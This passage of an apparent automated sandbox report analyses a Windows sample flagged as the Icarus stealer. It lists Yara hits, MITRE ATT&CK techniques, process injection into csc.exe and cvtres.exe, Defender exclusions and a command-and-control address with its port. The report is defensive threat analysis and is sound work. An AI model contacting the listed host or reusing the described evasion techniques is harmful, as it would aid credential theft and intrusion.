                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: \rkd.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Icarus stealer
                  Source: Yara matchFile source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Icarus stealer
                  Source: Yara matchFile source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  Create Account                  		312
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder                  		1
                  Registry Run Keys / Startup Folder                  		111
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                  Obfuscated Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync12
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526431 Sample: licarisan_api.exe Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 48 ipinfo.io 2->48 50 15.164.165.52.in-addr.arpa 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 10 other signatures 2->62 11 licarisan_api.exe 1 2 2->11         started        15 explorer.exe 5 4 2->15         started        17 explorer.exe 4 2->17         started        signatures3 process4 file5 46 C:\Users\user\Music\...yesUpdater.exe, PE32 11->46 dropped 74 Writes to foreign memory regions 11->74 76 Allocates memory in foreign processes 11->76 78 Drops large PE files 11->78 80 Injects a PE file into a foreign processes 11->80 19 csc.exe 1 11->19         started        signatures6 process7 signatures8 64 Writes to foreign memory regions 19->64 66 Allocates memory in foreign processes 19->66 68 Injects a PE file into a foreign processes 19->68 22 cvtres.exe 15 5 19->22         started        26 explorer.exe 19->26         started        process9 dnsIp10 52 193.142.146.64, 49803, 49815, 49832 HOSTSLICK-GERMANYNL Netherlands 22->52 54 ipinfo.io 34.117.59.81, 49804, 49816, 49833 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 22->54 72 Adds a directory exclusion to Windows Defender 22->72 28 cmd.exe 1 22->28         started        31 cmd.exe 1 22->31         started        33 conhost.exe 22->33         started        signatures11 process12 signatures13 82 Adds a directory exclusion to Windows Defender 28->82 35 powershell.exe 23 28->35         started        38 conhost.exe 28->38         started        40 powershell.exe 23 31->40         started        42 conhost.exe 31->42         started        process14 signatures15 70 Loading BitLocker PowerShell Module 35->70 44 WmiPrvSE.exe 35->44         started        process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  licarisan_api.exe21%ReversingLabsWin32.Trojan.Midie
                  licarisan_api.exe34%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ipinfo.io0%VirustotalBrowse
                  15.164.165.52.in-addr.arpa0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://ascstats.iobit.com/usage.phpU0%VirustotalBrowse
                  http://piriform.com/go/app_cc_privacy_policy0%VirustotalBrowse
                  http://www.piriform.com/ccleaner0%VirustotalBrowse
                  http://ipinfo.io/ip0%VirustotalBrowse
                  http://ipinfo.io/ipd0%VirustotalBrowse
                  http://piriform.com/go/app_cc_license_agreement0%VirustotalBrowse
                  http://ipinfo.io0%VirustotalBrowse
                  https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ipinfo.io
                  		34.117.59.81
                  		truefalseunknown
                  15.164.165.52.in-addr.arpa
                  		unknown
                  		unknownfalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  193.142.146.64:8880true
                    		unknown
                    http://ipinfo.io/ipfalseunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://piriform.com/go/app_cc_privacy_policylicarisan_api.exe, EyesUpdater.exe.0.drfalseunknown
                    http://ascstats.iobit.com/usage.phpUlicarisan_api.exe, EyesUpdater.exe.0.drfalseunknown
                    http://www.piriform.com/ccleanerlicarisan_api.exe, EyesUpdater.exe.0.drfalseunknown
                    http://ipinfo.iodcvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000303A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://piriform.com/go/app_cc_license_agreementlicarisan_api.exe, EyesUpdater.exe.0.drfalseunknown
                      http://ipinfo.io/ipdcvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
